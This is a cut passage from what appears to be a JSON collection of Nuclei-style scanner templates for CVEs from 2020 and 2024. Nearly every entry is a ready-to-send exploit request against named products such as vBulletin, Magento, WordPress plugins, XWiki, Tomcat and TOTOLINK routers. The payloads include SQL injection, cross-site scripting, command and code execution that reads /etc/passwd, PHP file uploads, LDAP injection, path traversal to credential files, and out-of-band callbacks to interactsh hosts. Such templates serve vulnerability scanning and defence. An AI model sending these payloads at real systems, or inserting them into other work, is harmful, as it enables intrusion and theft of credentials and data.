Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML feed"]}]},{"raw":["POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-34257","info":{"name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/page/index.html\n\n{\n\"token\":\"\",\n\"apcliEncrypType\":\"`id>../{{file}}.txt`\",\n\"topicurl\":\"setWiFiExtenderConfig\"\n}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"success\": true"]},{"type":"regex","part":"body_2","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4879","info":{"name":"ServiceNow UI Macros - Template Injection","severity":"unknown"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j=\"jelly\"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class=\"outputmsg_text\">1787569</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28255","info":{"name":"OpenMetadata - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(interactsh_protocol, 'dns')","contains(body, \"java.lang.Boolean\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-1561","info":{"name":"Gradio 4.3-4.12 - Local File Read","severity":"high"},"requests":[{"raw":["POST /component_server HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"component_id\": \"1\", \"data\": \"{{path}}\", \"fn_name\": \"move_resource_to_block_cache\", \"session_hash\": \"aaaaaaaaaaa\"}\n","GET /file={{download_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\"?([^\"]+)"]}],"payloads":{"path":["c:\\\\windows\\\\win.ini","/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5421","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/info/dir?/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/var/tmp</td>","File System Info","face=\"courier"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1061","info":{"name":"WordPress HTML5 Video Player - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header, \"application/json\")","contains_all(body, \"created_at\", \"video_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-0195","info":{"name":"SpiderFlow Crawler Platform - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SPIDER_FLOW_VERSION"]}]},{"raw":["POST /function/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-34102","info":{"name":"Adobe Commerce & Magento - CosmicSting","severity":"critical"},"requests":[{"raw":["POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://{{interactsh-url}}/xxe.xml\",\"dataIsURL\":true,\"options\":12345678}}}}}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(content_type, \"application/json\")","contains_any(body, \"log file\", \"cartId\", \"no Route\")","contains(body, \"message\")"],"condition":"and"}]}]},{"id":"CVE-2024-31982","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20","{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"],"skip-variables-check":true,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Hello from search text:42</title>\", \"<title>RSS feed\")","contains(header, \"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32231","info":{"name":"Stash < 0.26.0 -  SQL Injection","severity":"critical"},"requests":[{"raw":["POST /graphql HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json\n\n{\"operationName\":\"FindPerformers\",\"variables\":{\"filter\":{\"q\":\"\",\"page\":1,\"per_page\":40,\"sort\":\"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -\",\"direction\":\"ASC\"},\"performer_filter\":{}},\"query\":\"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\\n  findPerformers(\\n    filter: $filter\\n    performer_filter: $performer_filter\\n    performer_ids: $performer_ids\\n  ) {\\n    count\\n    performers {\\n      ...PerformerData\\n      __typename\\n    }\\n    __typename\\n  }\\n}\\n\\nfragment PerformerData on Performer {\\n  id\\n  name\\n  disambiguation\\n  url\\n  gender\\n  twitter\\n  instagram\\n  birthdate\\n  ethnicity\\n  country\\n  eye_color\\n  height_cm\\n  measurements\\n  fake_tits\\n  penis_length\\n  circumcised\\n  career_length\\n  tattoos\\n  piercings\\n  alias_list\\n  favorite\\n  ignore_auto_tag\\n  image_path\\n  scene_count\\n  image_count\\n  gallery_count\\n  movie_count\\n  performer_count\\n  o_counter\\n  tags {\\n    ...SlimTagData\\n    __typename\\n  }\\n  stash_ids {\\n    stash_id\\n    endpoint\\n    __typename\\n  }\\n  rating100\\n  details\\n  death_date\\n  hair_color\\n  weight\\n  __typename\\n}\\n\\nfragment SlimTagData on Tag {\\n  id\\n  name\\n  aliases\\n  image_path\\n  parent_count\\n  child_count\\n  __typename\\n}\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["converting driver\\.Value type string \\(\\\\\"3.*?\\\\\"\\) to a int: invalid syntax"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5947","info":{"name":"Deep Sea Electronics DSE855 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Copyright Deep Sea Electronics\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /Backup.bin HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"Unknown\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1709","info":{"name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SetupWizard.aspx/{{string}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SetupWizardPage","ContentPanel SetupWizard"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","part":"header","kval":["Server"]}]}]},{"id":"CVE-2024-31621","info":{"name":"Flowise 1.6.5 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/API/V1/credentials"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"credentialName\":","\"updatedDate\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37393","info":{"name":"SecurEnvoy Two Factor Authentication - LDAP Injection","severity":"critical"},"requests":[{"raw":["POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:{{userid}})(sAMAccountName=*\nMEMBEROF:Domain Users\n","POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:*)(sAMAccountName=*\nMEMBEROF:Domain Users\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Error checking Group')","status_code_1 == 200","contains(body_2, 'GETPASSCODE')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5765","info":{"name":"WpStickyBar <= 2.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body, \"/plugins/wpstickybar-sticky-bar-sticky-header\")"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stickybar_display&banner_id=1%20AND%20SLEEP(6);\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, 